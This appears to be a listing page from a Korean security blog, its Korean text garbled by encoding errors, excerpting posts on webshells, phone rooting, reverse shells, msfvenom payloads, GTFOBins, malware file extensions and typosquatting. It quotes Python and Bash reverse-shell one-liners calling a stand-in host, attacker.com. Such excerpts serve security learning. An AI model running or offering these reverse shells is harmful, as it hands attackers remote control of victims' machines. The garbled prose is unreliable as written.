728x90 ๐์ ๋ณด๋ณด์122 ์น ๋ณด์ - PHP ๊ฐ๋จํ ์น์(easy-simple-php-webshell.php) "> ์ถ์ฒ: https://gist.github.com/joswr1ght/22f40787de19d80d110b37fb79ac3985 easy-simple-php-webshell.phpGitHub Gist: instantly share code, notes, and snippets.gist.github.com 2023. 2. 2. ๋ชจ๋ฐ์ผ ๋ณด์ - ์ค๋งํธํฐ ๋ฃจํ ๋ฃจํ ์ ํ์ํ ๋๊ตฌ์ ํ์ผ๋ค ๋ค์ด๋ก๋ https://autoroot.chainfire.eu/ CF-Auto-Root autoroot.chainfire.eu ๋ฃจํ ๋ฐฉ๋ฒ https://liz09045.tistory.com/128 ์๋๋ก์ด๋ ๋ฃจํ ๋ฐฉ๋ฒ(Galaxy A8/SM-A880S) [ํธ๋ํฐ ์ค์ ] ์๋๋ก์ด๋ ํฐ์์ [์ค์ ] -> [ํด๋์ ํ ์ ๋ณด] -> [์ํํธ์จ์ด์ ๋ณด] ์ ๋ค์ด๊ฐ [๋น๋๋ฒํธ]๋ฅผ 7๋ฒ ์ ๋ ์ฐ์์ผ๋ก ๋๋ฌ์ค ๋ค, ๋ค์ [์ค์ ]์ผ๋ก ๊ฐ๋ฉด ๋งจ ์๋์ [๊ฐ๋ฐ์ ๋ชจ๋]๊ฐ ์ผ์ง๋ค. liz09045.tistory.com 2023. 1. 26. ์์คํ ๋ณด์ - ํ์ด์ฌ ๋ฆฌ๋ฒ์ค ์ ์คํฌ๋ฆฝํธ export RHOST=attacker.com export RPORT=12345 python -c 'import sys,socket,os,pty;s=socket.socket() s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))) [os.dup2(s.fileno(),fd) for fd in (0,1,2)] pty.spawn("/bin/sh")' ๋๋ถ๋ถ์ ์ ๋์ค ๊ณ์ด์ OS(๋ฆฌ๋ ์ค, ๋งฅos)์๋ python2๋ ์ค์น๊ฐ ๋์ด์๋ ๊ฒฝ์ฐ๊ฐ ๋ง์ผ๋ ๋ณ๋์ ์ค์น ์์ด ๋ช ๋ น์ด๋ง์ผ๋ก ์ฌ์ฉ ๊ฐ๋ฅํ๋ค. ์ถ์ฒ: https://gtfobins.github.io/gtfobins/python/#reverse-shell python | GTFOBins Run socat file:`tt.. 2023. 1. 25. ์์คํ ๋ณด์ - ๋ฉํ์คํ๋ก์ msfvenom ๋ฆฌ๋ฒ์ค ์ ์ ์ ๋ช ๋ น์ด ์ถ์ฒ: https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/ MSFVenom Reverse Shell Payload Cheatsheet (with & without Meterpreter) Encrypt and Anonymize Your Internet Connection for as Little as $3/mo with PIA VPN. Learn More There are tons of cheatsheets out there, but I couldn’t find a comprehensive one that includes n… infinitelogins.com ์๋์ฐ msfvenom -p windows/meterp.. 2023. 1. 24. ๋ณด์ - GTFOBins, ์์คํ ๋ณด์ ๋ฌด๋ ฅํ ๋ช ๋ น์ด ๋ชจ์๋ค https://gtfobins.github.io/ GTFOBins pg Shell File read SUID Sudo gtfobins.github.io ์์) Bash ๋ฆฌ๋ฒ์ค ์ ํ์ฑํ ๋ช ๋ น์ด export RHOST=attacker.com export RPORT=12345 bash -c 'exec bash -i &>/dev/tcp/$RHOST/$RPORT 2023. 1. 22. ์น ๋ณด์ - ๋ฐ์ธ๋ ์, ๋ฆฌ๋ฒ์ค ์, ๋๋ธ ๋ฆฌ๋ฒ์ค ์ ๋ฐ์ธ๋ ์ ธ์ ํ๊น ๋๋ฐ์ด์ค์ ์ค์น๋ ์ ธ์ ์ผ์ข ์ด๋ค. ๊ณต๊ฒฉ ๋์์ด ๋๋ ํธ์คํธ์ ํน์ ํฌํธ์ ๋ฐ์ธ๋ฉ๋ผ ๋๋ฐ์ด์ค์ ๋ํด ์์ ๋๊ธฐํ๋ฉฐ, ํด์ปค๋ ์๊ฒฉ์ผ๋ก ์ด ์น์ ธ์ ์ก์ธ์คํด ๋์ ํธ์คํธ์์ ์คํฌ๋ฆฝํธ๋ฅผ ์คํํ๋ ๋ฐ ์ฌ์ฉํ ์ ์๋ค. ๋ฆฌ๋ฒ์ค ์ ธ์ ๊ณต๊ฒฉ์๊ฐ ๋ณด์ ์ทจ์ฝ์ ์ ์ด์ฉํด ํธ์คํธ ์ปดํจํฐ์ ์๊ฒฉ์ผ๋ก ์ฐ๊ฒฐํ ์ ์๋๋ก ํ ํ, ๊ณต๊ฒฉ์๊ฐ ์์ฐ์ ํฌํธ๋ฅผ ์ด๋ฉด ํธ์คํธ ์ปดํจํฐ๊ฐ ๊ณต๊ฒฉ์์ ํฌํธ์ ์ ์ํ๋ ๋ฐฉ์์ด๋ค. ๊ทธ ์ดํ ๊ณต๊ฒฉ์๋ ํผํด์์ ์ปดํจํฐ๋ฅผ ๋ง์๋๋ก ์กฐ์ข ํ ์ ์๋ค. ๋๋ธ ๋ฆฌ๋ฒ์ค ์ ธ์ ๊ณต๊ฒฉ ๋์์ด ๋๋ ํธ์คํธ๊ฐ ํด์ปค๋ก๋ถํฐ ๊ณต๊ฒฉ์ ๋ฐ๋ ํฌํธ๊ฐ ์๋ ๋ณ๋์ ํฌํธ๋ก ํด์ปค์ ์ฅ์น์ ์ฐ๊ฒฐ๋๋ ๊ฒ์ด๋ค. ๋ฐ๋ผ์ ์ ๋ ฅ ํธ๋ํฝ ํฌํธ์ ์ถ๋ ฅ ํธ๋ํฝ ํฌํธ ๋ฑ ์๋ก ๋ค๋ฅธ ๋ ๊ฐ์ ์ฐ๊ฒฐํฌํธ๊ฐ ์๋ค. ์น์ ธ์ ์๋ฒ์ ์ฌ๋ฆฌ๋ ๋ฐฉ๋ฒ์ ํ์ผ ์ .. 2022. 12. 5. ๋ณด์ - ์นจํด์ฌ๊ณ ๋์๋ฒ ๋์ "์๋ฝ์๋ฝ ๋ณด์ 119" ๋ฆฌ๋ทฐ ์๋ฝ์๋ฝ ๋ณด์ 119 ์๋ฝ์๋ฝ ๋ณด์ 119, ์ ์ฑ ์ฝ๋, ํดํน, ํผ์ฑ, ๋์ฌ์จ์ด, ๋๋์ค๋ฅผ ๋๋นํ๋ ์ฐ๋ฆฌ์ ์์ธ๋ฅผ ์์๋ณด๋ ์ฑ ์ ์ฝ์ด ๋ณด์๋ค. ์ต๊ทผ์ ๋๋์ฑ ๋ณด์์ ๊ด์ฌ์ ๊ฐ์ง๊ฒ ๋๋ฉด์ ์ฌ์ด๋ฒ ๋ณด์ ๊ด๋ จ ์๋ฃ๋ค์ ์ธํฐ๋ท์์ ์ฐพ์์์ง๋ง ๋ถ์กฑํ ์ ์ด ๋ง๋ค๊ณ ๋๊ปด ์ ์ ๋ณด์ ๊ด๋ จ ์ ๋ฌธ๊ฐ๊ฐ ์งํํ ์ด ์ฑ ์ ์ ํํ๊ฒ ๋์๋ค. ์ฑ ์ ์์ ์ ๊ทธ๋ฆผ ์๋ฃ๊ฐ ์์ด์ ๋ ์ดํดํ๊ธฐ๊ฐ ์ฝ๊ณ , ๋ฌด์๋ณด๋ค๋ ๋์ฑ ๋ง์์ ๋ค์๋ ์ ์ ๋์ ๋ฐฉ๋ฒ์ด ์ ํ ์๋ ๊ฒ! ๋ง์ฐฌ๊ฐ์ง๋ก ์ฌ์ง์ผ๋ก ์ค๋ช ๋์ด ์์ด์ ๊ทธ๋๋ก ๋ฐ๋ผ ํ๊ธฐ๋ง ํ๋ฉด ์์ฌ์ด ์ฌ๊ณ ๋์์ด ๊ฐ๋ฅํ๋ค. ์ฑ ์ ์ด๋ฆ์ด "์๋ฝ์๋ฝ ๋ณด์ 119"์ธ ์ด์ ๊ฐ 119๊ฐ์ง ๋ณด์ ์ํ ์ฌ๋ก๋ฅผ ๋ค๋ฃจ๊ธฐ ๋๋ฌธ์ ๋ถ์ฌ์ง ์ด๋ฆ์ด๋ฉฐ, ๋ชฉ์ฐจ๋ฅผ ๋ณด๋ฉด ์๊ฒ ์ง๋ง ์ ~~~~๋ง ๋ค์ํ ์ํ ์ฌ๋ก๋ค์ ๋ค๋ฃฌ๋ค. ์ฐ๋ฆฌ์๊ฒ ์ต์.. 2022. 10. 9. ์์คํ ๋ณด์ - EXE ํ์ฅ์๋ฅผ ๋์ฒดํ๋ ํ์ฅ์๋ค(SCR, COM, BAT) .exe ํํ์ ์คํ ํ๋ก๊ทธ๋จ ๋ง๊ณ ๋ .scr๊ณผ .com์ผ๋ก๋ ๋์ผํ ์คํ ๊ฒฐ๊ณผ๋ฅผ ๊ฐ์ ธ์ฌ ์ ์๋ค. .scr .scr์ ํ๋ฉด ๋ณดํธ๊ธฐ ์ฆ Windows Screensaver๋ฅผ ์๋ฏธํ์ง๋ง ๋ง์ฐฌ๊ฐ์ง๋ก ํฌ๋งท ์ข ๋ฅ๊ฐ ์คํ ํ์ผ ํํ๋ผ์ .exe ํ์ผ์ ํ์ฅ์๋ฅผ .scr๋ก ๋ฐ๊ฟ๋ง ์ค๋ ๋๊ฐ์ด ์คํ์ด ์ ๋๋ค. ์ด๋ฅผ ์ ์ฉํ์ฌ ๋ฐฑ์ ํ๋ก๊ทธ๋จ์ด .exe๋ฅผ ์ฐ์ ์ ์ผ๋ก ๊ฒ์ฌํ๋ค๋ ๊ฒ์ ์ฐํํ๊ธฐ ์ํด์ .scr์ ๋์ ์ฌ์ฉํ๋ ๋ฉ์จ์ด๋ ์กด์ฌํ๋ค. .com .com์ DOS Command File์ผ๋ก .scr๊ณผ ๋ง์ฐฌ๊ฐ์ง๋ก ์คํ ํ์ผ ํฌ๋งท์ ๊ฐ์ง๊ณ ์์ด์ .exe ํ์ผ์ .com์ผ๋ก ๋ฐ๊ฟ์ค๋ ๋์ผํ๊ฒ ์คํ๋๋ค. ์๋๋ DOS ํ๊ฒฝ์์ ์์ฃผ ์ฌ์ฉ๋๋ ํ์ฅ์์ด์๋ค๊ณ ํ๋ค. ์ฐ๋ฆฌ๊ฐ ์์ฃผ ์ฌ์ฉํ๋ ์ธํฐ๋ท ๋๋ฉ์ธ ".com"๊ณผ๋ ๋ค๋ฅธ ๊ฒ.. 2022. 10. 7. ์์คํ ๋ณด์ - Jscript Jscript๋ ECMA์คํฌ๋ฆฝํธ ํ์ค์ ๊ธฐ๋ฐ์ ๋ ์คํฌ๋ฆฝํ ์ธ์ด์ด๊ธฐ ๋๋ฌธ์ Javascript๊ณผ ๋ฌธ๋ฒ์ด ๋๊ฐ๋ค. ๊ฒ๋ค๊ฐ ๋ ๋ค ๋ธ๋ผ์ฐ์ ์์ ์คํ์ํค๋ ์คํฌ๋ฆฝํธ ์ธ์ด์ธ ๊ฒ๋ ๋์ผํ๋ค. (Jscript: ๋ง์ดํฌ๋ก์ํํธ ๊ฐ๋ฐ, Javascript: ๋ท์ค์ผ์ดํ ๊ฐ๋ฐ) ํ์ง๋ง ๋์ด ๊ฐ๋ค๊ณ ํ ์๋ ์๋ ๊ฒ Jscript๋ ์์คํ ๋ด์ ์ธ๋ถ ํ๋ก๊ทธ๋จ์ ์คํ์ํฌ ์ ์๋ WScript(์๋์ฐ ์คํฌ๋ฆฝํธ ํธ์คํธ)๋ฅผ ์ถ๊ฐํ ์ธ์ด๋ผ๋ ์ . ์์๋ก Jscript๋ ์ธํฐ๋ท ์ต์คํ๋ก๋ฌ์์ ์ฐ์ด๋๋ฐ(์ง๊ธ์ ์ฌ์ฉ ์ค๋จํ์ง๋ง) ์ฐ๋ฆฌ๊ฐ ์ํ ์ฌ์ดํธ์ ๋ค์ด๊ฐ๊ฒ ๋๋ฉด ์ปดํจํฐ์ ๊น๋ ค์๋ ๋ณด์ ํ๋ก๊ทธ๋จ๊ณผ ์ํธ์์ฉ์ ํ๊ฒ ๋๋๋ฐ ์ด๊ฒ WScript ๋๋ถ์ ๊ฐ๋ฅํ ์ผ์ด๋ค. ๊ฐ๋ ์๋์ฐ์์ .js ํ์ผ์ ํ์ธํ๋ฉด ์๋์ฒ๋ผ ๋ญ๊ฐ ์์ด์ฝ๋ ์๊ณ ํ๋ฐ .. 2022. 10. 6. ์น ๋ณด์ - IP ๊ธฐ๋ฐ ๊ฒ์ฆ ๋๊ตฌ(criminalip) https://criminalip.com ์ฃผ์๋ ์์ดํผ๋ฅผ ์ ๋ ฅํ๋ฉด ์ํ๋๋ฅผ ๋ถ์ํ์ฌ ์๋ ค์ฃผ๋ ์ฌ์ดํธ๋ค. 2022. 10. 6. ์น ๋ณด์ - ํ์ดํฌ์ค์ฟผํ (Typosquatting) ์ฌ์ฉ์๊ฐ ๋๋ฉ์ธ ์ฃผ์๋ฅผ ์ค์๋ก ์๋ชป ์ ๋ ฅ์ ํ๋ ๊ฒ์ ์ ์ฉํ์ฌ ์๋ชป ์ ๋ ฅ๋ ์ฃผ์์ ์ฌ์ดํธ์ ๋ฐ์ด๋ฌ์ค๋ฅผ ์ฌ์ด ๋ค์ด๋ก๋๋ฅผ ์ ๋ํ๋ ๊ณต๊ฒฉ ๋ฐฉ์์ด๋ค. ๋ํ์ ์ผ๋ก google.com์ ์ค์๋ก ์๋ชป ์ ๋ ฅํ goggle.com, gooogle.com ๋ฑ ์ด ์๋ค. ๋งค๊ทธ๋๋ฒ ๋ฅด(Magniber)๋ผ๋ ๋์ฌ์จ์ด ๋ํ ํ์ดํฌ์ค์ฟผํ ์ ์ด์ฉํ์ฌ ๋ค์ด๋ก๋๋ฅผ ์ ๋ํ๋ ๋ฐฉ์์ ์ฌ์ฉํ๋ค. https://asec.ahnlab.com/ko/39376/ ๋งค๊ทธ๋๋ฒ ๋ฅด(Magniber) ๋์ฌ์จ์ด ๋ณ๊ฒฝ (*.js -> *.wsf) - 09/28 - ASEC BLOG ASEC ๋ถ์ํ์ ์ง๋ 9์ 8์ผ ๋งค๊ทธ๋๋ฒ ๋ฅด ๋์ฌ์จ์ด๊ฐ CPL ํ์ฅ์ ์์ JSE ํ์ฅ์๋ก ๋ณ๊ฒฝ๋จ์ ๋ธ๋ก๊ทธ๋ฅผ ํตํด ์๊ฐํ ๋ฐ ์๋ค. ๊ณต๊ฒฉ์๋ 9์ 8์ผ ์ดํ์๋ ์ง๋ 9์ 16์ผ์๋ J.. 2022. 10. 6. ๋ณด์ - ๋ฌด๋ฃ ์คํ์์ค ๊ธฐ๋ฐ ์ํํธ์จ์ด(FOSS) ์ถ์ฒ ์ฌ์ดํธ ๋ชจ์ https://www.privacyguides.org/ Home Privacy Guides is your central privacy and security resource to protect yourself online. www.privacyguides.org https://www.privacytools.io/ Best Privacy Tools in 2022: Software Alternatives Usability: Is the app or service user-friendly and easy to use? A modern and well-designed interface makes it easy to understand for users and therefore can be widely adopt.. 2022. 9. 29. ์ด์ 1 ยทยทยท 3 4 5 6 7 8 9 ยทยทยท 11 ๋ค์ 728x90